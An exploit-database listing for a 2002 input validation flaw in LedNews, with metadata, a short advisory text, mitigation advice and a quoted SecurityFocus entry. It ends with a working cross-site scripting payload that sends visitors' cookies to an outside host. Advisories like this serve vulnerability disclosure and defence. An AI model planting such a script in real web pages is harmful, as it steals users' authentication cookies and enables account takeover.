header-logo
Suggest Exploit
vendor:
LedNews
by:
SecurityFocus
7,5
CVSS
HIGH
Input Validation
20
CWE
Product Name: LedNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

LedNews Input Validation Vulnerability

LedNews is vulnerable to an input validation vulnerability which allows an attacker to steal authentication cookies or perform other nefarious activities. This is done by inserting a malicious script into a news post which redirects the user to a malicious website.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7920/info

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. 

<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>